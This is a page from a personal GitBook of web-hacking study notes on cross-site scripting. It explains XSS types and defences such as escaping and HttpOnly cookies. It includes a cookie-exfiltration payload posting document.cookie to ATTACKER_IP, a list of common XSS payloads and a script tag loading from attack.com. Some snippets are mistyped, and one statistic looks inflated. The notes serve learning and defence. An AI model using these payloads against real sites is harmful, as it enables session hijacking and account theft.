P
P
Pirate Moo's Collection of Notes
Searchโ€ฆ
๐Ÿฎ
PirateMoo's GitBook
Web Hacking
๐Ÿ‘’
Web Basics
โŒ
XSS
โœจ
privesc
๐Ÿงœ
Vulnerabilities
๐Ÿชต
Log4Shell
๐Ÿƒ
Spring4Shell
๐Ÿ”ง
Dirty Pipe
๐Ÿง
Pwnkit
๐Ÿซ€
Enumerations
๐Ÿš
Reverse Shells
โ˜ 
Handy cmds
๐Ÿงฌ
DNS Enumeration
๐Ÿฅž
Subdomain Enumeration
๐Ÿ‘พ
moosint
๐Ÿ‘ป
OSINT
๐Ÿ’ซ
CTF Related
๐Ÿ”ซ
CTF Tool List
Powered By GitBook
โŒ
XSS
Cross-Site Scripting, or XSS is a web based vulnerability that enables injections of scripts into web pages by attackers in order to bypass access controls by attackers. It's one of the largest vulnerabilities seen on the web, accounting for more than 84% of all bugs; while also being the largest paying vulnerability, with more than $4 million dollars given in bounties in 2020 alone. These script injections can be written in any language that a browser can understand and execute (JavaScript, HTML).
  • HTML allows inclusion of executable scripts within documents using <script> tags
  • Websites use these scripts to make pages interactive and control app logic
1
<script> alert("Hi"); </script>
2
<script src="This-is-a-webpage-link"></script>
3
<script> location="http://www.moo.com";</script>
4
โ€‹
5
<!-- Using XSS to steal cookies in example below if HttpOnly flag not set -->
6
<script> image = new Image();
7
image.src='http://ATTACKER_IP/?c=' +document.cookie; </script>
Copied!
Inline scripts: Scripts embedded within an HTML file (not loaded from elsewhere)
Validating User Input: App checks that user input meets a standard (no malicious JS) Sanitizing input: App modifies chars in input that interfere with HTML logic before processing
Types of XSS:
  1. 1.
    Stored
  2. 2.
    Reflected
  3. 3.
    DOM-based
Stored XSS: When user input is stored on a server/retrieved unsafely. When an app accepts usr input w/out validation, stores it in servers, then renders it on user browsers without sanitization
  • Can make its way into the DB and victim browsers
  • Most severe XSS type
  • Attacks mean malicious scripts are stored on target app servers for others to access
Blind XSS: Stored XSS vulnerabilities whose malicious input is stored by the server and executed in another part of the app or in another app you can't see.
Reflected XSS: When usr input is returned to the user without being stored in a DB. The app takes in input, processes it server-side and returns it to the usr.
DOM-Based XSS: (Document Object Model) is a model browsers use to render web pages. DOM is the page's structure.
  • Similar to reflected XSS but user input never leaves the user's browser, then returns to the user
  • Targets a web page's DOM directly
Self XSS: Require victims to input a malicious payload themselves
  • Requires social engineering
  • Not counted towards bug bounties
Prevention: Implementing controls
  1. 1.
    Robust input validation
  2. 2.
    Contextual output escaping and encoding
Escaping: The practice of encoding special characters so that they are interpreted literally instead of as a special character by the programs/machines that process the characters.
  • Ensures browsers won't misinterpret characters as code to execute
1
<img onload=alert('image') src="example.png"
2
javascrip:alerct('hi')
3
<img src="IMAGE" />
4
โ€‹
5
// Common Payloads
6
<iframe src=javascript:alert(1)>
7
<body onload=alert(1)>
8
"><img src=x onerror=prompt(1);>
9
<script>alert(1)<!-
10
<a mouseover"alert(1)">test</a>
11
<script src=//attack.com/test.js>
Copied!
Measures to mitigate:
  • Can set HttpOnly flag on sensitive cookies that a site uses
    • Prevents attackers from stealing cookies via XSS
    • Lets restrictions for resources on JS, CSS, and images be handled on pages
Polyglot: A type of XSS payload that executes in multiple contexts
Web Hacking - Previous
Web Basics
Next
privesc
Last modified 5mo ago
Copy link